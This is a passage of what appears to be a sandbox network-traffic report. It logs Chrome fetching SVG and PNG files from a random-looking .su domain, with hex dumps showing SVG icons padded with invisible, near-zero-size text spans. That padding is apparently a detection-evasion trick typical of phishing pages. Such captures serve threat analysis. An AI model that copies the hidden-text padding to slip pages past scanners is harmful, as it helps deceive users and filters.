                                                          Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
                                                          2024-01-24 14:34:32 UTC728INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:32 GMT
                                                          Content-Type: image/svg+xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          cache-control: no-store, no-cache, must-revalidate
                                                          pragma: no-cache
                                                          vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uIu%2BnYOKkkF%2FQH%2FnqujI5l%2FHePrBEGN58Kes9Vh57YbM5e4z2Vl192lTrmSKMxICl8z%2Bhw8sx16uWuEyLuxtAuOAivAJahpHB2a1aJh%2Ft8qo45N6JuNxIewrkFj0LfhZ5yb30amzqV%2Buy%2BuBp9T7EZhqFhXt"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 84a8ff6f8baa1d66-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:32 UTC641INData Raw: 34 31 63 0d 0a 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 45 6b 48 54 75 4f 46 6a 6f 34 75 4e 4d 51 61 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e
                                                          Data Ascii: 41c<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">EkHTuOFjo4uNMQa</span><span style="display: in
                                                          2024-01-24 14:34:32 UTC418INData Raw: 39 34 2e 35 39 34 4c 37 2e 36 31 37 2c 31 31 2e 35 37 38 48 31 38 76 2e 38 34 34 48 37 2e 36 31 37 6c 33 2e 39 32 31 2c 33 2e 39 32 38 2d 2e 35 39 34 2e 35 39 34 4c 36 2c 31 32 6c 34 2e 39 34 34 2d 34 2e 39 34 34 6d 30 2d 2e 31 34 31 2d 2e 30 37 31 2e 30 37 4c 35 2e 39 32 39 2c 31 31 2e 39 32 39 2c 35 2e 38 35 38 2c 31 32 6c 2e 30 37 31 2e 30 37 31 2c 34 2e 39 34 34 2c 34 2e 39 34 34 2e 30 37 31 2e 30 37 2e 30 37 31 2d 2e 30 37 2e 35 39 34 2d 2e 35 39 35 2e 30 37 31 2d 2e 30 37 2d 2e 30 37 31 2d 2e 30 37 31 4c 37 2e 38 35 38 2c 31 32 2e 35 32 32 48 31 38 2e 31 56 31 31 2e 34 37 38 48 37 2e 38 35 38 6c 33 2e 37 35 31 2d 33 2e 37 35 37 2e 30 37 31 2d 2e 30 37 31 2d 2e 30 37 31 2d 2e 30 37 2d 2e 35 39 34 2d 2e 35 39 35 2d 2e 30 37 31 2d 2e 30 37 5a 22 20 66
                                                          Data Ascii: 94.594L7.617,11.578H18v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944m0-.141-.071.07L5.929,11.929,5.858,12l.071.071,4.944,4.944.071.07.071-.07.594-.595.071-.07-.071-.071L7.858,12.522H18.1V11.478H7.858l3.751-3.757.071-.071-.071-.07-.594-.595-.071-.07Z" f
                                                          2024-01-24 14:34:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          44192.168.2.649768104.21.21.1794432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:32 UTC455OUTGET /VDgyaQMqDddyxrJrBbYdMwrE/67S3WMjHVWYUUT0/6C2eccLE3a HTTP/1.1
                                                          Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
                                                          2024-01-24 14:34:32 UTC718INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:32 GMT
                                                          Content-Type: image/svg+xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          cache-control: no-store, no-cache, must-revalidate
                                                          pragma: no-cache
                                                          vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gXv1YVy9eDKLAgHtsvTUMUIY604ryCGq74VLcvUOkhaQfuQPpcA1NTVOOn3bR%2BHSzeoFUD7MUgUxRk0we4%2FGFatFHXEmr%2FcxV7xgSzv9WOdK4w7wBavWvDP3BNIJftRxiznARMLROjg7DwAPsbF8sbWHNCQL"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 84a8ff6fba1a6743-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:32 UTC651INData Raw: 39 38 66 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 39 22 20 68 65 69 67 68 74 3d 22 35 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 36 20 34 34 22 3e 3c 64 65 66 73 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 31 4a 6e 36 46 53 63 57 79 65 4f 57 3c 2f 74 65 78 74 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e
                                                          Data Ascii: 98f<svg xmlns="http://www.w3.org/2000/svg" width="49" height="50" viewBox="0 0 46 44"><defs><text style="display: inline;color: rgba(26, 125, 117, 0);max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">1Jn6FScWyeOW</text><span style="display: inlin
                                                          2024-01-24 14:34:32 UTC1369INData Raw: 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 4e 67 43 39 4d 6e 76 6c 39 52 4c 3c 2f 73 70 61 6e 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 35 22 20 68 65 69 67 68 74 3d 22 35 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39 2c 30 2c 30 2c 31 2c 31 39 2c 33 30 61 31 30 2e 39 2c 31 30 2e 39 2c 30 2c 30 2c 31 2d 35 2e 35 34 37 2d 31 2e 35 2c 31 31 2e 31 30 36 2c 31 31 2e 31 30 36 2c 30 2c 30 2c 31 2d 32 2e 32 31 39 2d 31
                                                          Data Ascii: 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">NgC9Mnvl9RL</span><rect class="a" width="45" height="52"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1
                                                          2024-01-24 14:34:32 UTC434INData Raw: 32 32 2c 32 2e 31 39 31 2c 32 2e 31 39 31 2c 30 2c 30 2c 31 2d 2e 34 33 38 2d 2e 36 34 31 41 31 2e 37 30 35 2c 31 2e 37 30 35 2c 30 2c 30 2c 31 2c 31 34 2c 31 36 61 31 2e 39 33 38 2c 31 2e 39 33 38 2c 30 2c 30 2c 31 2c 2e 31 35 36 2d 2e 37 38 31 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 34 32 32 2d 2e 36 32 35 2c 32 2e 31 39 31 2c 32 2e 31 39 31 2c 30 2c 30 2c 31 2c 2e 36 34 31 2d 2e 34 33 38 41 31 2e 37 30 35 2c 31 2e 37 30 35 2c 30 2c 30 2c 31 2c 31 36 2c 31 34 5a 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f
                                                          Data Ascii: 22,2.191,2.191,0,0,1-.438-.641A1.705,1.705,0,0,1,14,16a1.938,1.938,0,0,1,.156-.781,2,2,0,0,1,.422-.625,2.191,2.191,0,0,1,.641-.438A1.705,1.705,0,0,1,16,14Z"/><text style="display: inline;color: rgba(26, 125, 117, 0);max-width: 0.01px;max-height: 0.01px;fo
                                                          2024-01-24 14:34:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          45192.168.2.649769104.21.21.1794432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:32 UTC459OUTGET /VDgyaQMqDddyxrJrBbYdMwrE/6zszKQogk5hPX/5ksp3DD5a7cAYqnU HTTP/1.1
                                                          Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
                                                          2024-01-24 14:34:32 UTC693INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:32 GMT
                                                          Content-Type: image/png
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          cache-control: no-store, no-cache, must-revalidate
                                                          pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FiQwKLP9DcDZAN5PGp8ObY6rQ2XztJpDQJAJHENZrJ2XNW08qVGaAN%2BJXs27eRxzMXU6rRbUC%2BF%2FN6ONDS5OSZvnJXnPJL1nU1j05kjrMpHgdaVgQ%2FiRyirCHOWGxoEJYjvaUNuBVRaPnG6ySNbEFaqOcNwa"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 84a8ff70b9a244d9-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:32 UTC676INData Raw: 33 31 33 63 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 0a 00 00 00 01 b2 08 06 00 00 00 28 51 9d 5c 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 25 74 45 58 74 64 61 74 65 3a 6d 6f 64 69 66 79 00 32 30 32 32 2d 30 37 2d 30 38 54 30 30 3a 33 31 3a 35 39 2b 30 30 3a 30 30 c1 e4 45 42 00 00 00 25 74 45 58 74 64 61 74 65 3a 63 72 65 61 74 65 00 32 30 32 32 2d 30 37 2d 30 38 54 30 30 3a 33 31 3a 35 39 2b 30 30 3a 30 30 b0 b9 fd fe 00 00 ff 43 49 44 41 54 78 5e ec dd 07 78 55 45 b7 f0 f1 15 d2 48 02 29 24 81 50 42 ef bd 57 e9 4d b0 63 6f 20 0a a8 88 5d b1 a2 28 2a 76 2c 58 51 50 04 45 c1 ae 60 a1 f7 5e 42 0b 10 42 4b 20 09 09 e9 09
                                                          Data Ascii: 313cPNGIHDR(Q\gAMAasRGBpHYs%%IR$%tEXtdate:modify2022-07-08T00:31:59+00:00EB%tEXtdate:create2022-07-08T00:31:59+00:00CIDATx^xUEH)$PBWMco ](*v,XQPE`^BBK
                                                          2024-01-24 14:34:32 UTC1369INData Raw: 67 a0 a8 a4 c0 6e 4d 42 a5 47 b3 30 e9 dc b4 8a 74 73 fc 0c 0f f1 d3 cf 02 00 00 00 00 00 00 00 00 00 00 00 b8 37 12 00 01 c0 20 c7 33 0a 64 c9 b6 54 59 1a 93 26 4b 62 52 65 6f 62 ae 7e 06 67 c2 cb 4b a4 7d 83 10 e9 df 36 c2 f1 88 94 ee 2d aa 48 a0 bf b7 7e 16 00 00 00 00 00 00 00 00 00 00 00 c0 bd 90 00 08 00 2e a6 aa fc 7d bf 3a 49 be 5e 75 4c 96 ed 38 21 7c 2c 97 1d 1f 9f 0a 72 41 b3 30 19 d2 b1 aa 0c ed 5c 55 9a d7 09 d6 cf 00 00 00 00 00 00 00 00 00 00 00 00 d8 1f 09 80 00 e0 02 87 53 f2 e4 a7 b5 c9 32 77 e5 51 59 b1 53 25 fd e9 27 50 ae ea 54 0d 90 a1 56 32 60 35 19 d8 3e 52 7c 7d 2a e8 67 00 00 00 00 00 00 00 00 00 00 00 00 ec 87 04 40 00 70 92 b4 cc 42 99 bd 38 41 3e 5d 74 44 b6 c6 67 e9 51 b8 4a 70 a0 af 5c dd 23 4a ae e9 5d 53 fa b6 8d 10 ef 0a
                                                          Data Ascii: gnMBG0ts7 3dTY&KbReob~gK}6-H~.}:I^uL8!|,rA0\US2wQYS%'PTV2`5>R|}*g@pB8A>]tDgQJp\#J]S
                                                          2024-01-24 14:34:32 UTC1369INData Raw: 46 66 2d 4d d4 23 80 7b 19 d4 2e 42 66 3e dc 5e 22 43 fd f5 08 00 00 00 00 00 00 00 00 00 00 00 f0 64 24 00 02 70 0b fb 12 73 e4 9a e7 37 4a cc c1 6c 3d 02 b8 a7 e8 c8 00 99 f3 68 07 5a 02 03 00 00 00 00 00 00 00 00 00 00 00 12 00 01 d8 df 37 2b 8f c9 2d 53 b6 4a 6e 7e b1 1e 01 dc 9b 8f 4f 05 79 ed b6 66 32 ee b2 fa 7a 04 00 00 00 00 00 00 00 00 00 00 00 78 22 12 00 01 d8 96 fa f4 9a f2 cd 7e 19 3f 7d b7 e3 9a 8f 32 78 9e 9b fa d4 94 f7 ee 6d 23 81 fe de 7a 04 00 00 00 00 00 00 00 00 00 00 00 78 12 12 00 01 d8 52 41 51 a9 dc f5 f6 36 99 b1 30 41 8f 00 9e a9 43 c3 10 f9 f6 a9 4e 52 33 22 40 8f 00 00 00 00 00 00 00 00 00 00 00 00 4f 41 02 20 00 db c9 c8 2e 94 2b 9f db 28 4b b7 a7 e9 11 c0 b3 55 0f af 28 df 3c d9 49 3a 37 09 d5 23 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: Ff-M#{.Bf>^"Cd$ps7Jl=hZ7+-SJn~Oyf2zx"~?}2xm#zxRAQ60ACNR3"@OA .+(KU(<I:7#
                                                          2024-01-24 14:34:32 UTC1369INData Raw: df 20 c5 c5 a5 7a 04 80 3b d8 1a 9f 25 0f 7c b0 43 47 00 00 00 00 00 00 00 00 00 00 00 c0 04 24 00 02 28 33 25 a5 a7 e4 e6 57 36 4b 42 ea 49 3d 02 c0 9d 4c fb e5 b0 cc 59 9a a8 23 00 00 00 00 00 00 00 00 00 00 00 e0 6a 24 00 02 28 33 93 66 ed 91 df b6 a4 ea 08 80 3b ba 73 ea 76 39 9c 92 a7 23 00 00 00 00 00 00 00 00 00 00 00 e0 4a 5e a7 1c f4 35 e0 d1 72 f2 8b 25 25 b3 40 b2 72 8b 24 2b af 44 0a 8b 4a 25 db 31 96 57 f0 c7 f5 3f 09 09 f2 15 3f 9f 0a 12 14 e0 2d 41 15 7d 24 c8 bf 82 84 87 f8 49 78 65 3f f1 75 8c 7b 8a f9 eb 93 e5 d2 67 d6 0b 9f 28 80 fb eb d3 2a 5c 7e 7f b1 9b 54 f0 f2 d2 23 00 00 00 00 00 00 00 00 00 e7 4e ed d5 aa 3d d9 a2 92 52 a9 e8 e7 2d 95 03 7d d8 87 00 00 e0 0c 91 00 08 8f a0 26 8c 87 92 f3 e4 40 52 be 1c 4c ce 75 5c e7 cb fe a4 5c
                                                          Data Ascii: z;%|CG$(3%W6KBI=LY#j$(3f;sv9#J^5r%%@r$+DJ%1W??-A}$Ixe?u{g(*\~T#N=R-}&@RLu\\
                                                          2024-01-24 14:34:32 UTC1369INData Raw: b4 cb 07 00 00 00 00 00 ee ea a5 2f f7 c9 e3 9f c6 ea c8 b5 d4 5a ce fa 37 2e 38 af c2 28 00 00 d8 09 09 80 70 ba 55 3b 4f c8 8b 8e 09 e0 82 4d 29 c2 ab cf 75 d4 e9 97 ab bb 47 c9 2d 83 6a 4b bf 76 11 52 e1 34 3d 82 93 d2 4f ca a5 4f af 97 4d 71 99 7a 04 00 fe de af cf 75 95 01 ed 23 75 04 00 40 f9 50 49 7a 71 89 39 b2 37 31 57 e2 8f e6 4a 42 da 49 49 4c cb 97 c3 29 8e 47 ea 49 c9 f8 4b 42 9f 29 54 0b 9a a8 2a fe 52 af 6a 80 d4 8a a8 28 75 22 03 a5 41 8d 20 69 12 5d 49 9a 39 1e 91 a1 fe fa 37 01 00 00 00 00 00 ec 45 ed ff f6 1e bf 5a 4c 4a 3d 68 59 b7 b2 ac 7d a3 a7 04 f8 fd 71 90 13 00 00 77 46 02 20 9c 42 bd ca 7e db 94 22 2f 7e b5 4f 96 ef 38 a1 47 61 8a 3a 55 03 64 f4 85 75 e4 8a 1e 51 ff 75 12 a6 a8 b8 54 be 5a 7e 54 1e f8 70 a7 a4 66 15 ea 51 00 f8
                                                          Data Ascii: /Z7.8(pU;OM)uG-jKvR4=OOMqzu#u@PIzq971WJBIIL)GIKB)T*Rj(u"A i]I97EZLJ=hY}qwF B~"/~O8Ga:UduQuTZ~TpfQ
                                                          2024-01-24 14:34:32 UTC1369INData Raw: 7e 06 76 54 a7 6a 80 55 15 70 cc 90 3a 12 1e 42 55 40 00 00 80 f2 44 02 20 4e 47 cd cd 7b 36 af 22 dd 1d 8f 0b 5a 56 91 66 75 2a 4b 05 4e d4 02 30 dc b5 cf 6f 94 79 ab 8e e9 c8 7c 33 1f 6a 27 37 f6 ab a5 23 00 00 dc 0b 09 80 38 63 ea 95 f2 de 8f 07 e4 fe 8f 76 b1 d1 07 00 38 63 1d 1a 86 c8 ba 37 7b 51 05 10 00 6c 2c 2b af 58 66 2d 3c 22 53 be 8b 97 f8 a4 3c 3d 0a 77 a1 aa 02 de dc a7 86 3c 74 75 43 ab 35 19 00 00 00 ca 1e 09 80 38 1b 41 01 3e d2 b3 59 98 f4 68 5e 45 ba b5 a8 22 5d 1d d7 01 7e b4 0e 06 60 96 ce f7 2c 97 4d 71 99 3a 32 df c4 1b 1a cb 84 9b 9a e8 08 00 00 f7 42 02 20 ce c8 91 e3 f9 72 cb ab 5b 64 e9 f6 34 3d 02 00 c0 99 9b ff 6c 17 19 dc b1 aa 8e 00 00 76 11 9f 94 2b 9f fc 72 58 de fe e9 90 64 e5 15 e9 51 b8 2b 95 ac 3f b8 5d a4 dc 75 69 3d
                                                          Data Ascii: ~vTjUp:BU@D NG{6"ZVfu*KN0oy|3j'7#8cv8c7{Ql,+Xf-<"S<=w<tuC58A>Yh^E"]~`,Mq:2B r[d4=lv+rXdQ+?]ui=
                                                          2024-01-24 14:34:32 UTC1369INData Raw: 00 84 69 7c 7c 2a c8 8d bd 6b c8 7d c3 ea 4b eb 7a 21 7a 14 00 ce dc cc 85 47 64 e4 eb 5b 75 64 36 d5 16 fd c4 57 17 b2 e7 06 00 70 5b 24 00 7a b8 cc dc 22 19 f6 ec 06 59 ba 3d 4d 8f 00 70 26 75 c3 d1 be 7e 88 0c 6a 17 21 7d db 45 5a 95 fe 7c 7d 68 a3 76 26 f2 0a 4a 64 5d 6c ba 2c d9 72 5c 7e db 92 2a 1b f6 65 e8 67 60 3a d5 72 e4 c8 cc 01 12 12 e4 ab 47 00 00 e5 e9 60 72 9e dc f5 76 8c fc b2 d9 3e 2d 59 60 3f ea fb fd 95 91 cd 64 cc 45 75 c5 cb 4b 0f 02 00 00 e0 ff 23 01 10 26 eb d5 b2 8a 3c 7c 55 43 19 d2 a9 1a f3 79 00 67 2c ee 68 8e 34 19 b5 44 47 66 53 fb 6f cb 5e e9 a1 23 00 00 dc 0f 09 80 1e ec 68 5a be 5c f8 c4 3a d9 79 38 5b 8f 00 70 06 d5 2a ed f2 ae 51 32 b4 4b 35 e9 da 2c 4c 02 fc dc bb 9d af b3 1c 39 9e 2f bf 6c 48 91 ef 56 1f 93 85 31 69 54
                                                          Data Ascii: i||*k}Kz!zGd[ud6Wp[$z"Y=Mp&u~j!}EZ|}hv&Jd]l,r\~*eg`:rG`rv>-Y`?dEuK#&<|UCyg,h4DGfSo^#hZ\:y8[p*Q2K5,L9/lHV1iT
                                                          2024-01-24 14:34:32 UTC1369INData Raw: 08 d7 f7 aa 2e f7 0f 6b 20 ed 1b 91 9c e4 89 8e a6 e5 cb 6b f3 f6 cb d4 9f 0f 49 71 71 a9 1e 45 59 bb ef b2 7a f2 da ed 2d 75 04 00 f8 37 aa a5 ca 3d 1f ec 14 6e e5 60 67 6a 5f f0 f1 ab 1b ca c4 11 4d d9 24 04 00 00 1e 81 04 40 b8 3b d5 16 f8 a3 fb db 48 ed aa 81 7a 04 80 27 52 fb 2a 17 3c b8 ca 65 9d e9 d4 12 c3 b4 7b da c8 c8 c1 b5 f5 08 00 00 9e 81 04 40 37 55 54 5c 2a c3 9e dd 20 f3 37 a6 e8 11 00 67 4a b5 2e b8 b9 4f 0d 79 e4 da 46 d2 a8 66 25 3d 0a 4f 76 3c a3 40 de fe 2e 5e 5e fd ee 00 15 01 cb 41 44 b0 9f 24 cc 1a 28 be 8e f7 1e 00 e0 9f 15 14 95 ca dd 53 63 e4 e3 df 8f e8 11 c0 fe ae ef 55 43 3e bc bf ad 04 fa 53 65 1b 00 00 b8 37 12 00 e1 09 54 b5 ef e7 6e 6e 22 f7 0d ab cf 41 1f c0 83 25 a5 9f 94 8b 26 ac 93 ad f1 59 7a c4 39 bc bd bd e4 a3 7b
                                                          Data Ascii: .k kIqqEYz-u7=n`gj_M$@;Hz'R*<e{@7UT\* 7gJ.OyFf%=Ov<@.^^AD$(ScUC>Se7Tnn"A%&Yz9{
                                                          2024-01-24 14:34:32 UTC1369INData Raw: 57 a4 4c c7 bc 39 fb 64 89 e4 3b e6 d3 19 39 9e 35 87 b6 8b db 87 d4 91 d7 6e 6f 21 01 8e 39 3f 00 28 25 8e cf f5 c4 d4 7c 39 91 5d e8 f8 ec 2e 91 53 8e ff 09 09 f4 91 c0 8a de 52 a7 5a 20 9f 17 00 00 9c 01 12 00 dd c0 6b f3 e2 64 fc f4 dd 3a 02 f0 57 2a a1 e8 f9 e1 4d e4 f6 8b eb 52 06 1c 4e a3 6e 56 df fc 36 5e 9e fc 6c 0f 6d 1b cf d2 af cf 75 95 01 ed 23 75 04 00 9e e7 2d c7 f7 c7 03 1f ed b4 0e f9 78 0a 1f 9f 0a 72 51 c7 48 b9 a6 57 4d b9 b8 4b 35 5b b7 f5 2d 2f 45 c5 a5 b2 2c 26 4d e6 ad 3c 2a 73 57 1e f3 98 8d 4c 95 04 f8 fb f3 5d a5 47 8b 2a 7a 04 00 00 c0 be 4c 4a 00 9c fb 78 47 19 76 41 75 1d b9 37 75 b0 a6 b0 b0 44 32 f2 8a ad 43 35 29 e9 85 92 9a 55 28 27 1c 8f 34 c7 23 35 bb 50 92 4e 14 48 52 46 81 1c 4c ce 93 c4 b4 02 ba 7b 38 41 e7 26 a1 f2
                                                          Data Ascii: WL9d;95no!9?(%|9].SRZ kd:W*MRNnV6^lmu#u-xrQHWMK5[-/E,&M<*sWL]G*zLJxGvAu7uD2C5)U('4#5PNHRFL{8A&
                                                          2024-01-24 14:34:32 UTC984INData Raw: c7 72 65 d7 a1 1c d9 9b 90 23 b1 47 b2 65 7f 52 9e b5 30 94 78 a2 c0 96 95 83 22 82 fd ac 24 ce 86 d5 83 a4 41 f5 40 a9 67 fd 54 71 a0 c7 24 0c a8 85 be 3b df dc 26 b3 96 26 ea 11 fc 69 de 13 1d e5 8a 1e 2c 44 03 70 4f 87 53 f2 a4 eb fd 2b dd aa fd 93 6a d7 74 7d af 1a 32 e9 96 66 52 b7 1a ed 59 4d 53 50 54 2a ef fd 78 40 9e 9a bd d7 6d 92 4e 47 0e a8 25 d3 ee 6f 67 bd f6 00 00 00 ec 80 04 40 9c 8e 5a ef fd 66 c5 31 f9 6c 49 82 ec 4d cc d5 a3 9e 6b fc 55 0d 64 f2 ad cd 75 04 00 00 00 e0 df 90 00 68 23 6a a3 b0 e5 9d b4 fe 85 67 0b 0a f0 91 f7 ef 6a 25 37 f4 ab a5 47 dc 53 52 fa 49 59 b5 e3 84 6c dc 97 21 eb f7 64 c8 86 b8 4c 8f 7a ef 57 0f af 28 1d 1a 04 4b bb fa 21 d2 a6 81 7a 04 4b bd 6a 41 6e bb c1 fb d6 b7 f1 f2 c0 47 bb ce bb 22 a3 3b b9 73 68 1d 99
                                                          Data Ascii: re#GeR0x"$A@gTq$;&&i,DpOS+jt}2fRYMSPT*x@mNG%og@Zf1lIMkUduh#jgj%7GSRIYl!dLzW(K!zKjAnG";sh


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          46192.168.2.649770104.21.21.1794432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:32 UTC452OUTGET /VDgyaQMqDddyxrJrBbYdMwrE/6uvwhtyYID/2RkyVQrL8NsC HTTP/1.1
                                                          Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
                                                          2024-01-24 14:34:32 UTC687INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:32 GMT
                                                          Content-Type: image/png
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          cache-control: no-store, no-cache, must-revalidate
                                                          pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
